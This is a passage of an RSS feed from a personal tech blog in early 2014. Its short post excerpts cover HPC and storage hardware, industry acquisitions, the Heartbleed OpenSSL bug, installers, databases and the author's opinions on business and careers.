      <guid>https://blog.scalability.org/2014/04/building-efficient-storage-and-computing-platforms-has-little-to-do-with-using-cheap-hardware/</guid>
      <description>This has been bugging me for a long time, and we have to address this in every discussion we have. You can&amp;rsquo;t build cost effective scale out systems on cheap-ass hardware designs. It&amp;rsquo;s woefully inefficient; the cost blows up to achieve the type of performance we can achieve, often with an order of magnitude fewer systems (hey &amp;hellip; that&amp;rsquo;s less acquisition cost, less TCO, less power/cooling, lower management strain, smaller footprint, tastes great, less filling, &amp;hellip;) The only way people recognize this is when they actually try it themselves.</description>
    </item>
    
    <item>
      <title>M&amp;A: Inktank acquired by Red Hat</title>
      <link>https://blog.scalability.org/2014/04/ma-inktank-acquired-by-red-hat/</link>
      <pubDate>Wed, 30 Apr 2014 15:01:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/ma-inktank-acquired-by-red-hat/</guid>
      <description>I am happy for Sage and team, this is a good exit. Obviously we didn&amp;rsquo;t know this was happening, but I guessed something like this a few weeks ago. Bigger picture: Open source technologies have been capturing mindshare from closed source object, file, and block for a while. This will serve to massively amplify this. GlusterFS was niche until Red Hat bought it. Then it went mainstream. Ceph isn&amp;rsquo;t GlusterFS though.</description>
    </item>
    
    <item>
      <title>When ideology trumps pragmatic design</title>
      <link>https://blog.scalability.org/2014/04/when-ideology-trumps-pragmatic-design/</link>
      <pubDate>Tue, 29 Apr 2014 03:41:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/when-ideology-trumps-pragmatic-design/</guid>
      <description>Real differentiation, adding real value to something, is often hard to do. Fundamental changes often take time, and are often incremental in scope, so they don&amp;rsquo;t break everything. That is, unless you are so completely convinced that your way is better, that you try to force the market in that direction. Sometimes these gambits work. Sometimes they don&amp;rsquo;t. This is about one that did not work. I am convinced my Mac OSX laptop may be the best laptop I&amp;rsquo;ve used.</description>
    </item>
    
    <item>
      <title>busy last two weeks, and lots of traveling next two weeks</title>
      <link>https://blog.scalability.org/2014/04/busy-last-two-weeks-and-lots-of-traveling-next-two-weeks/</link>
      <pubDate>Tue, 29 Apr 2014 03:12:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/busy-last-two-weeks-and-lots-of-traveling-next-two-weeks/</guid>
      <description>We&amp;rsquo;ve been cranking out the products to ship to customers, and I&amp;rsquo;ve been fretting over tests, as usual. And I finished my initial pass at the automated installer. It builds our new Debian based systems very nicely, though there is still a little human interaction. Working on it. And it should work perfectly for all Ubuntu as well. Have an install in Hollywood this week. New market for us, very interesting and it plays completely to our strengths.</description>
    </item>
    
    <item>
      <title>when the networking revolution comes, the cheap switches will be the first ones against the wall</title>
      <link>https://blog.scalability.org/2014/04/when-the-networking-revolution-comes-the-cheap-switches-will-be-the-first-ones-against-the-wall/</link>
      <pubDate>Tue, 29 Apr 2014 03:04:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/when-the-networking-revolution-comes-the-cheap-switches-will-be-the-first-ones-against-the-wall/</guid>
      <description>Seriously &amp;hellip; no more cheap switches as the central point of information flow in storage or computing clusters. The money you save will be blown in the first hour you pay for down time or architectural changes you need to actually move your data without tossing packets on the ground &amp;hellip; &amp;hellip; because while standard network codes don&amp;rsquo;t care so much if they need to retransmit or lose data, cluster file systems get very &amp;hellip; very &amp;hellip; testy when data doesn&amp;rsquo;t arrive when and where it is supposed to, in the right order, because the cheap-ass switch was too busy tossing packets on the floor.</description>
    </item>
    
    <item>
      <title>Slides from HPC on Wall Street Spring 2014 are up</title>
      <link>https://blog.scalability.org/2014/04/slides-from-hpc-on-wall-street-spring-2014-are-up/</link>
      <pubDate>Tue, 15 Apr 2014 19:30:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/slides-from-hpc-on-wall-street-spring-2014-are-up/</guid>
      <description>See here. Very good conference, lots of good discussion.</description>
    </item>
    
    <item>
      <title>hate to be an alarmist, but Heartbleed is worse than I had thought it was</title>
      <link>https://blog.scalability.org/2014/04/hate-to-be-an-alarmist-but-heartbleed-is-worse-than-i-had-thought-it-was/</link>
      <pubDate>Tue, 08 Apr 2014 22:43:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/hate-to-be-an-alarmist-but-heartbleed-is-worse-than-i-had-thought-it-was/</guid>
      <description>TL;DR: Run, as in now, before you finish reading this, to update vulnerable OpenSSL packages. Restart your OpenSSL using services (ssh, https, openvpn). Then nuke your keys, and start all over again. Yeah, it&amp;rsquo;s that bad. I had hoped, incorrectly, that no one would start asking, &amp;ldquo;hey, can we exploit this in the wild?&amp;rdquo; any time soon. Unfortunately &amp;hellip; exploits are live and out there. Have a look at this session hijacking done using the bug.</description>
    </item>
    
    <item>
      <title>Sometime things work far better than one might expect</title>
      <link>https://blog.scalability.org/2014/04/sometime-things-work-far-better-than-one-might-expect/</link>
      <pubDate>Tue, 08 Apr 2014 16:22:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/sometime-things-work-far-better-than-one-might-expect/</guid>
      <description>The day job builds a storage product which integrates Ceph as the storage networking layer. What happened was, in idiomatic American English: We made very tasty lemonade out of very bitter lemons. For the rest of the world, this means we had a bad situation during our setup at the booth. 3 boxes of drives and SSDs. 2 of them arrived. The 3rd may have been stolen, or gone missing, or wound up in a shallow grave somewhere.</description>
    </item>
    
    <item>
      <title>Sometimes the right level of caffeination helps in work</title>
      <link>https://blog.scalability.org/2014/04/sometimes-the-right-level-of-caffeination-helps-in-work/</link>
      <pubDate>Thu, 03 Apr 2014 21:10:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/sometimes-the-right-level-of-caffeination-helps-in-work/</guid>
      <description>I had an opportunity to review an old post I had written about playing with prime numbers. In it, I wrote out an explicit formula for a number, expressed as a product of primes. This goes to the definition of a composite or a prime number. What&amp;rsquo;s interesting is what leaps out at you when you look at something you wrote a while ago. Looking at the formula I wrote down, there is a very easy way to determine whether a number is prime or composite.</description>
    </item>
    
    <item>
      <title>Doing what we are passionate about</title>
      <link>https://blog.scalability.org/2014/04/doing-what-we-are-passionate-about/</link>
      <pubDate>Wed, 02 Apr 2014 06:20:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/doing-what-we-are-passionate-about/</guid>
      <description>I am lucky. I fully admit this. There are people out there who will tell you that it&amp;rsquo;s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say &amp;ldquo;I am lucky&amp;rdquo;. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.</description>
    </item>
    
    <item>
      <title>Negative latencies</title>
      <link>https://blog.scalability.org/2014/04/negative-latencies/</link>
      <pubDate>Tue, 01 Apr 2014 15:28:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/04/negative-latencies/</guid>
      <description>I&amp;rsquo;ve been thinking for a while that our obsession with reduction of latency in computing and storage could be ameliorated by exploiting a negative latency design. A negative latency design would be one where a hypothetical message would arrive at a receiver before the sender completed sending it. There are a few issues with this. First off is how on earth, or elsewhere, is this possible? Second, aren&amp;rsquo;t there issues with causality violations?</description>
    </item>
    
    <item>
      <title>HPC on Wall Street session on low latency cloud</title>
      <link>https://blog.scalability.org/2014/03/hpc-on-wall-street-session-on-low-latency-cloud/</link>
      <pubDate>Mon, 31 Mar 2014 20:31:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/hpc-on-wall-street-session-on-low-latency-cloud/</guid>
      <description>See here for the program sheet. The session is here: HPC on Wall Street Flyer Description is this:
Wall Street and the global financial markets are building low latency infrastructures for processing and timely response to information content in massive data flows. These big data flows require architectural design patterns at a macro- and micro-level, and have implications for users of cloud systems. This panel will discuss, from macro to micro, how new capabilities and technologies are making a positive impact.</description>
    </item>
    
    <item>
      <title>Arista files for IPO</title>
      <link>https://blog.scalability.org/2014/03/arista-files-for-ipo/</link>
      <pubDate>Mon, 31 Mar 2014 14:20:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/arista-files-for-ipo/</guid>
      <description>From Dan Primack&amp;rsquo;s Term Sheet email</description>
    </item>
    
    <item>
      <title>Intel ditches own Hadoop distro in favor of Cloudera</title>
      <link>https://blog.scalability.org/2014/03/intel-ditches-own-hadoop-distro-in-favor-of-cloudera/</link>
      <pubDate>Thu, 27 Mar 2014 18:29:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/intel-ditches-own-hadoop-distro-in-favor-of-cloudera/</guid>
      <description>Last year, Intel started building its own distro of Hadoop. Their argument was that they were optimizing it for their architecture (as compared to, say, ARM). Today came word (via InsideHPC.com) that they are switching to Cloudera. This makes perfect sense to me. Intel couldn&amp;rsquo;t really optimize Hadoop by compiler options to use new instruction capability (part of their selling point), as Hadoop is a Java thing. And Java has its own VM, and many performance touch points that have nothing to do with processor architecture.</description>
    </item>
    
    <item>
      <title>Nice interview with Freeman Dyson</title>
      <link>https://blog.scalability.org/2014/03/nice-interview-with-freeman-dyson/</link>
      <pubDate>Thu, 27 Mar 2014 00:29:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/nice-interview-with-freeman-dyson/</guid>
      <description>Freeman Dyson is an incredible scientist. I imagine he, Terence Tao, Paul Erdos and a number of others are all woven from the same cloth. Dyson has done some amazing work, and probably will do some more amazing work. The interview is here. One of the comments he made really struck me as being dead on correct &amp;hellip;
I&amp;rsquo;ve used similar language, describing a Ph.D. as a union card. And I agree it takes far too long in physics.</description>
    </item>
    
    <item>
      <title>Free market forces at work, the way they should be</title>
      <link>https://blog.scalability.org/2014/03/free-market-forces-at-work-the-way-they-should-be/</link>
      <pubDate>Tue, 25 Mar 2014 15:29:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/free-market-forces-at-work-the-way-they-should-be/</guid>
      <description>There&amp;rsquo;s a much publicized (in SV) trial going on over an oligarchic wage suppression scheme that was in force between a number of big players in SV. Apart from Facebook that is. Techcrunch has the details. What transpires when free market forces are allowed to work with their invisible hands unconstrained? Simple.
Kudos to Facebook for doing the right thing, though in all honesty, I don&amp;rsquo;t attribute this to being altruistic on their part.</description>
    </item>
    
    <item>
      <title>Staring into voids that stare back</title>
      <link>https://blog.scalability.org/2014/03/staring-into-voids-that-stare-back/</link>
      <pubDate>Tue, 25 Mar 2014 14:31:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/staring-into-voids-that-stare-back/</guid>
      <description>I had mentioned this in my write up about our 10 year anniversary.
And this post yesterday from Scott Weiss at Andreessen Horowitz
Its in that staring deep and hard into the yawning void that one gets their inspiration. Call it sheer abject terror, or motivation. Whatever. It juices your processors into overdrive if you are an entrepreneur. You are at your most creative when you are at your most fearful.</description>
    </item>
    
    <item>
      <title>Good read on ageism in SV VCs</title>
      <link>https://blog.scalability.org/2014/03/good-read-on-ageism-in-sv-vcs/</link>
      <pubDate>Mon, 24 Mar 2014 11:57:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/good-read-on-ageism-in-sv-vcs/</guid>
      <description>Oddly enough at the New Republic. Article is here. I was somewhat amused by the read, but some of it rang quite true. It&amp;rsquo;s nice to hear of more of the signals one needs to read VC tea leaves. They never say no, but they do move goal posts, always outward, always away from you. The article implies they get hung up on TAM, as a proxy for what they really think.</description>
    </item>
    
    <item>
      <title>Unicode and python 64 bit build</title>
      <link>https://blog.scalability.org/2014/03/unicode-any-python-64-bit-build/</link>
      <pubDate>Sat, 22 Mar 2014 18:25:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/unicode-any-python-64-bit-build/</guid>
      <description>[Update] I gave up on 2.7.x. Nothing I did made it work. I removed all the options apart from prefix for compilation of 3.4.0. That worked. Now onto building ipython, ijulia and other good things (SciPy stack). We will use 3.x going forward rather than try to remain compatible with 2.x. Updating our tool chain to include a modern python which will be outside of the distro version. Long &amp;hellip; long experience dealing with distro based tools are that they are usually &amp;hellip; badly &amp;hellip; out of date.</description>
    </item>
    
    <item>
      <title>SIOS Inst</title>
      <link>https://blog.scalability.org/2014/03/sios-inst/</link>
      <pubDate>Sat, 22 Mar 2014 13:15:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/sios-inst/</guid>
      <description>Ok, I am taking the leap. I&amp;rsquo;ve started working on the SIOS Inst system. Basically, after reviewing everything that&amp;rsquo;s broken (and for that matter unfixable) in the anaconda, debian-installer, and other installation mechanisms, I&amp;rsquo;ve decided that for our purposes, the only way that we are going to get correct and reliable builds for stateful systems is to forgo these systems&amp;rsquo; advanced installation mechanisms. If we can skip the code entirely, we will.</description>
    </item>
    
    <item>
      <title>HPC on Wall Street</title>
      <link>https://blog.scalability.org/2014/03/hpc-on-wall-street/</link>
      <pubDate>Thu, 20 Mar 2014 15:09:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/hpc-on-wall-street/</guid>
      <description>Not only do we have a booth, but we are sponsoring a session on Low Latency Cloud and Big Data. Roosevelt Hotel in NYC on 7-April. See the site for more details. If you&amp;rsquo;d like to attend and need a pass, please contact me at the day job. Our partners Lucera, Inktank, and Pluribus Networks will be there with us. Possibly more.</description>
    </item>
    
    <item>
      <title>Not so fast ...</title>
      <link>https://blog.scalability.org/2014/03/not-so-fast/</link>
      <pubDate>Tue, 18 Mar 2014 23:46:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/not-so-fast/</guid>
      <description>Well, after nearly a decade of hooplah over a realization of a quantum computer, an interesting study found that it was
There are a few important elements of this &amp;hellip; it uses 1/5th the number of qubits that the newer generation machine used. But it wasn&amp;rsquo;t, as earlier reported, thousands of times faster.
Way back in the day, when working on benchmarking big machines, and comparing performance, one of the major criteria was using identical (or as near to identical) algorithms as possible to assess machine speed, compiler quality, etc.</description>
    </item>
    
    <item>
      <title>Which (computer) language to learn next?</title>
      <link>https://blog.scalability.org/2014/03/which-computer-language-to-learn-next/</link>
      <pubDate>Sun, 16 Mar 2014 16:55:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/which-computer-language-to-learn-next/</guid>
      <description>Ok, I have as one of my professional goals, to learn a new computer language. I am at master level in several, proficient in others, and have working knowledge of a fair number. I&amp;rsquo;ve forgotten more than I care to admit about some (Fortran, Basic, C/C++, APL, x86 Assembler). The contenders for me should be useful languages. These are not things that should be learned for the sake of learning, but for real useful purposes.</description>
    </item>
    
    <item>
      <title>OT: AirBnB and their issues</title>
      <link>https://blog.scalability.org/2014/03/ot-airbnb-and-their-issues/</link>
      <pubDate>Sun, 16 Mar 2014 16:19:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/ot-airbnb-and-their-issues/</guid>
      <description>Ok, this one is sad. Saw this linked off of hacker news. I am not sure if this is satirical, humorous, or real. It doesn&amp;rsquo;t quite matter though. We&amp;rsquo;ve used AirBnB twice now. And we have a firm policy, as a direct result of those very negative experiences, of never &amp;hellip; ever &amp;hellip; using it again. To be fair, AirBnB is effectively a market maker dealing with the commodity of unused space which could be turned into a profitable asset.</description>
    </item>
    
    <item>
      <title>Playing with several noSQL/document/tuple/time series DBs</title>
      <link>https://blog.scalability.org/2014/03/playing-with-several-nosqldocumenttupletime-series-dbs/</link>
      <pubDate>Sun, 16 Mar 2014 04:00:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/playing-with-several-nosqldocumenttupletime-series-dbs/</guid>
      <description>We&amp;rsquo;ve been using MongoDB for a while for a number of things, internally, and thinking about using it for Tiburon as the restful interface. It has some nice aspects about it, but it also has some known issues for larger DBs. Considering what we want to do for some of our work, these larger DB issues are potentially problematic for us. Basically, MongoDB is one of the class of mmap&amp;rsquo;ed DBs.</description>
    </item>
    
    <item>
      <title>Retired Apache as web server</title>
      <link>https://blog.scalability.org/2014/03/retired-apache-as-web-server/</link>
      <pubDate>Sun, 16 Mar 2014 03:05:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/retired-apache-as-web-server/</guid>
      <description>This has been a long time coming for me. I&amp;rsquo;ve been using Apache in one form or another since the 90&amp;rsquo;s. I&amp;rsquo;ve never found it easy to configure, and often ran into maddening bugs in the config files and how they interacted with the server itself. I&amp;rsquo;d taken a long time to evaluate the various alternatives. Lighttpd caught my fancy for a while, but I ran into similar problems with config.</description>
    </item>
    
    <item>
      <title>Couldn&#39;t have said it better myself ...</title>
      <link>https://blog.scalability.org/2014/03/couldnt-have-said-it-better-myself/</link>
      <pubDate>Sat, 15 Mar 2014 00:22:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/couldnt-have-said-it-better-myself/</guid>
      <description>Robin at StorageMojo has an interesting article up (right after the one about Violin maybe being dead). I won&amp;rsquo;t comment on that second one, other than to say I disagree with his analysis and conclusions. As the day job is nominally a competitor (we&amp;rsquo;ve seen them in a deal, once) I am biased. But the fundamental analysis simply doesn&amp;rsquo;t look good for them (or Fusion, or &amp;hellip;). They need a larger player to buy them.</description>
    </item>
    
    <item>
      <title>The resurrection of autoinst ...</title>
      <link>https://blog.scalability.org/2014/03/the-resurrection-of-autoinst/</link>
      <pubDate>Thu, 13 Mar 2014 01:16:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/the-resurrection-of-autoinst/</guid>
      <description>A long time ago, in a galaxy far, far away &amp;hellip; I worked for this company named SGI. SGI machines and software were awesome &amp;hellip; I had used them (R3k and R8k) for doing calculations for my thesis. Very very fast. But very hard to install/manage. In fact, brutally hard. This was not lost on customers with many of these devices. One of those customers read SGI the riot act on this.</description>
    </item>
    
    <item>
      <title>Good read on the faux-STEM shortages</title>
      <link>https://blog.scalability.org/2014/03/good-read-on-the-faux-stem-shortages/</link>
      <pubDate>Mon, 10 Mar 2014 15:30:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/good-read-on-the-faux-stem-shortages/</guid>
      <description>Good post over at Math Blog. There is no shortage of STEM folks in the US, and there hasn&amp;rsquo;t been for a long &amp;hellip; long time. Any shortage of STEM folks would be well represented by a number of economic factors: 1) rapidly rising compensation rates (economic scarcity impacts upon costs of labor), 2) very short job search times for STEM folks, 3) additional market based initiatives to find and retain STEM folks.</description>
    </item>
    
    <item>
      <title>Reality vs what one might like</title>
      <link>https://blog.scalability.org/2014/03/reality-vs-what-one-might-like/</link>
      <pubDate>Tue, 04 Mar 2014 17:19:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/reality-vs-what-one-might-like/</guid>
      <description>Many years ago, I had this thought in my head that I wanted to be a physics professor. No, really. I went through all the motions. Undergrad BS, then MS and then PhD. While I was doing this, the Soviet Union collapsed. How was that fact related to my former desire to be a physics prof? Simple. It&amp;rsquo;s economics. It&amp;rsquo;s always economics. Anyone tells you differently, they are either lying or selling you something.</description>
    </item>
    
    <item>
      <title>Just created a new external dns on Digital Ocean</title>
      <link>https://blog.scalability.org/2014/03/just-created-a-new-external-dns-on-digital-ocean/</link>
      <pubDate>Tue, 04 Mar 2014 05:20:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/just-created-a-new-external-dns-on-digital-ocean/</guid>
      <description>About 2 years ago, we had an issue with an internal server blowing up, taking data and config with it. I resolved to place some of our core infrastructure (external DNS, etc.) beyond our virtual boundaries, so we could maintain email/web presence in the event of a power or server issue. This has proven to be a prescient and wise move. We started out on Amazon with their small instances. And started out with dnsmasq, as I didn&amp;rsquo;t want to re-learn bind and all that config.</description>
    </item>
    
    <item>
      <title>Our second(!) Unison FhGFS based unit</title>
      <link>https://blog.scalability.org/2014/03/our-second-unison-fhgfs-based-unit/</link>
      <pubDate>Mon, 03 Mar 2014 22:26:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/03/our-second-unison-fhgfs-based-unit/</guid>
      <description>Burning in &amp;hellip; Hammering on all disks, while computing pi, e, sqrt(2), &amp;hellip; It is a thing of beauty &amp;hellip;
First one was an Isilon replacement. We seem to have many more of these in queue.</description>
    </item>
    
    <item>
      <title>A must-read on HD selection</title>
      <link>https://blog.scalability.org/2014/02/a-must-read-on-hd-selection/</link>
      <pubDate>Fri, 28 Feb 2014 19:32:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/a-must-read-on-hd-selection/</guid>
      <description>Henry could probably write far more in depth about this subject than he did. Regardless, this is a must-read article. Now it is important to understand where you can use each technology, and Henry does a great job of explaining some of these. However, it&amp;rsquo;s important to note that as some of the file system and device bits are pushed into higher levels in the stack, some of the functionality becomes redundant at the lower levels.</description>
    </item>
    
    <item>
      <title>darn</title>
      <link>https://blog.scalability.org/2014/02/darn/</link>
      <pubDate>Fri, 28 Feb 2014 15:46:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/darn/</guid>
      <description>E: Couldn&#39;t find these debs: pico dtrace  Forgot what platform I was working on &amp;hellip;</description>
    </item>
    
    <item>
      <title>Big blue blues?</title>
      <link>https://blog.scalability.org/2014/02/big-blue-blues/</link>
      <pubDate>Fri, 28 Feb 2014 15:04:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/big-blue-blues/</guid>
      <description>I remember my two stints at IBM T.J. Watson very well &amp;hellip; first as a summer student (college hire for summer), and then as an engineer after finishing undergraduate. It was a wonderful place. I really enjoyed it. Not simply computer nerd heaven, but physical scientist nerd heaven as well. IBM famously was the company that resisted layoffs and downsizing for a long time. But it eventually gave in, and was forced into RIF actions during their troubled times in the 1990&amp;rsquo;s and 2000&amp;rsquo;s.</description>
    </item>
    
    <item>
      <title>In 18 months ...</title>
      <link>https://blog.scalability.org/2014/02/in-18-months/</link>
      <pubDate>Mon, 24 Feb 2014 06:15:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/in-18-months/</guid>
      <description>&amp;hellip; I&amp;rsquo;ll have hit 10 years of blogitude &amp;hellip; bloggerisms &amp;hellip; er &amp;hellip; generation of large amounts of noise and heat, and hopefully at least a little light? Mebbe?</description>
    </item>
    
    <item>
      <title>Excellent article on Lucera&#39;s financial cloud</title>
      <link>https://blog.scalability.org/2014/02/excellent-article-on-luceras-financial-cloud/</link>
      <pubDate>Fri, 21 Feb 2014 03:41:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/excellent-article-on-luceras-financial-cloud/</guid>
      <description>&amp;hellip; that the day job is building atop our siCloud platform. In the article (definitely read it!) there is a great discussion about the fundamental differences between what Lucera is aiming for and what more traditional commodity cloud vendors are focused upon. When it comes down to it, the difference is architecting for density of VMs in the commodity cloud versus architecting for performance and low latency in the performance cloud (Lucera&amp;rsquo;s).</description>
    </item>
    
    <item>
      <title>Does fibre channel have a future?</title>
      <link>https://blog.scalability.org/2014/02/does-fibre-channel-have-a-future/</link>
      <pubDate>Thu, 20 Feb 2014 02:30:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/does-fibre-channel-have-a-future/</guid>
      <description>Strange question. It&amp;rsquo;s really a question about block storage in general more than FC in particular, but I have a sense that FC may be the first to go down, as it were. Ok &amp;hellip; I&amp;rsquo;ve been looking up mechanisms to help customers in a media editing environment. Their preferred file system depends, to a degree, upon IP over FC for connectivity. They need to interconnect Mac OSX machines, Linux and Windows machines to the same storage resources.</description>
    </item>
    
    <item>
      <title>The end of an era</title>
      <link>https://blog.scalability.org/2014/02/the-end-of-an-era/</link>
      <pubDate>Tue, 18 Feb 2014 21:09:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/the-end-of-an-era/</guid>
      <description>Posted to the xfs list:
SGI is stepping out of maintainer roles for xfs, xfsprogs, xfsdump, and xfstests. This removes me from the MAINTAINERS entry. Signed-off-by: XXXXXXXXXXXXXX --- [SGI will continue to host oss.sgi.com as a repository for the XFS open source git trees, mailing list, and documentation as is provided today. And will also continue to participate in a less formal role.] Thanks! -Ben MAINTAINERS | 1 - 1 file changed, 1 deletion(-)  SGI, the original creator of xfs almost 20 years ago, is removing itself from the pathway going forward.</description>
    </item>
    
    <item>
      <title>Updates: been busy, but here are a few</title>
      <link>https://blog.scalability.org/2014/02/updates-been-busy-but-here-are-a-few/</link>
      <pubDate>Sat, 15 Feb 2014 17:34:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/updates-been-busy-but-here-are-a-few/</guid>
      <description>We&amp;rsquo;ve sold our first Unison storage cloud to replace an Isilon unit for a bioinformatics core. Performance and density matter, and we have both. About to deploy next phase of cloud for one of our partners &amp;hellip; Setting up an exciting trade show presence &amp;hellip; Working on an extension of what we&amp;rsquo;ve been wanting to build for a long time &amp;hellip; and now it looks like it&amp;rsquo;s in reach. Oh &amp;hellip; my &amp;hellip; this is huge &amp;hellip;</description>
    </item>
    
    <item>
      <title>Why not go Galt?</title>
      <link>https://blog.scalability.org/2014/02/why-not-go-galt/</link>
      <pubDate>Sun, 09 Feb 2014 22:59:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/why-not-go-galt/</guid>
      <description>For those who don&amp;rsquo;t get the reference, &amp;ldquo;going Galt&amp;rdquo; points back to the masterpiece novel &amp;ldquo;Atlas Shrugged&amp;rdquo; by Ayn Rand. In it, one of the characters is named John Galt, and part of what he does, early in the novel, is convince those who create jobs and wealth in the country to abandon their efforts, as the government lurches harder and farther to the redistributionist world view. Indeed, the country eventually goes full on socialist in the story, where people are not allowed to quit work, take a better job, and so forth.</description>
    </item>
    
    <item>
      <title>The state of HPC tier 1 vendors</title>
      <link>https://blog.scalability.org/2014/02/the-state-of-hpc-tier-1-vendors/</link>
      <pubDate>Fri, 07 Feb 2014 19:27:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/the-state-of-hpc-tier-1-vendors/</guid>
      <description>Much has been happening in the HPC tier 1 vendor space. Some of it has made the news, much has not. The TL;DR version: I believe that most of the tier 1 HPC capability may have been wiped out over the last few months. One tier 1 vendor and a bunch of tier 2 vendors are left. Basically, the HPC market has a number of tiers within it, and product mixes across these tiers.</description>
    </item>
    
    <item>
      <title>Lyrical offspring</title>
      <link>https://blog.scalability.org/2014/02/lyrical-offspring/</link>
      <pubDate>Fri, 07 Feb 2014 03:28:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/lyrical-offspring/</guid>
      <description>I can&amp;rsquo;t name her, at her request, but this is my progeny singing for her high school battle of the bands. They took second place.
Fantastic job, offspring of mine!</description>
    </item>
    
    <item>
      <title>The changing face of storage</title>
      <link>https://blog.scalability.org/2014/02/the-changing-face-of-storage/</link>
      <pubDate>Thu, 06 Feb 2014 17:04:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/the-changing-face-of-storage/</guid>
      <description>Over at InsideHPC, Rich pointed to a blog by Henry Newman about the changing face of SSD. I&amp;rsquo;d argue that it&amp;rsquo;s not just SSD, but storage in general. But Henry, as usual, nails it. Henry opines
To a degree, we see them at least investing in the technologies behind the up market devices. At &amp;ldquo;worst&amp;rdquo; acquiring them. Because as Henry points out
Very much so. Look at Seagate and WD with their micro NAS appliances.</description>
    </item>
    
    <item>
      <title>On those annoying full page non-scrollable javascript ads on pages</title>
      <link>https://blog.scalability.org/2014/02/on-those-annoying-full-page-non-scrollable-javascript-ads-on-pages/</link>
      <pubDate>Thu, 06 Feb 2014 16:52:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/on-those-annoying-full-page-non-scrollable-javascript-ads-on-pages/</guid>
      <description>Guys, please, seriously, stop that. They don&amp;rsquo;t work on mobile or desktop devices when the window size is smaller than the area required to see the [X] Close button. Whoever came up with this, it is a bad idea. Stop it now. Before I get pissed off enough to write a web proxy that specifically filters out such stupidity, or purposefully renders that to an offscreen invisible layer which is forced to be non-modal.</description>
    </item>
    
    <item>
      <title>An offer for the day job&#39;s customers in financial services</title>
      <link>https://blog.scalability.org/2014/02/an-offer-for-the-day-jobs-customers-in-financial-services/</link>
      <pubDate>Tue, 04 Feb 2014 20:05:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/an-offer-for-the-day-jobs-customers-in-financial-services/</guid>
      <description>See here. TL;DR version: A free month on Lucera&amp;rsquo;s cloud.</description>
    </item>
    
    <item>
      <title>OCP thoughts</title>
      <link>https://blog.scalability.org/2014/02/ocp-thoughts/</link>
      <pubDate>Sun, 02 Feb 2014 20:01:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/ocp-thoughts/</guid>
      <description>I didn&amp;rsquo;t post a response to the article written a little more than a year ago claiming that OCP had &amp;ldquo;blown up the server market&amp;rdquo;. Yes, that was really in the title. I&amp;rsquo;ll ignore most of the obvious issues with this, but let&amp;rsquo;s review a year later, shall we? Open hardware designs are great in concept. Share your design with the world, and lower your customers&amp;rsquo; costs &amp;hellip; er &amp;hellip; whoops.</description>
    </item>
    
    <item>
      <title>IBM&#39;s sale of x86 servers and networking to Lenovo</title>
      <link>https://blog.scalability.org/2014/02/ibms-sale-of-x86-servers-and-networking-to-lenovo/</link>
      <pubDate>Sun, 02 Feb 2014 07:04:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/02/ibms-sale-of-x86-servers-and-networking-to-lenovo/</guid>
      <description>I&amp;rsquo;d waited a while before posting on this for a number of reasons, not the least of which was that I was quite busy. But also, I wanted to understand what was and was not sold. Now that some of the dust has settled, and both companies have publicly discussed this, we know pretty well what is included in the sale. I don&amp;rsquo;t need to get into that aspect; you can read it all very succinctly on Lenovo&amp;rsquo;s site.</description>
    </item>
    
    <item>
      <title>The last straw for us for gluster</title>
      <link>https://blog.scalability.org/2014/01/the-last-straw-for-us-for-gluster/</link>
      <pubDate>Wed, 29 Jan 2014 15:38:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/01/the-last-straw-for-us-for-gluster/</guid>
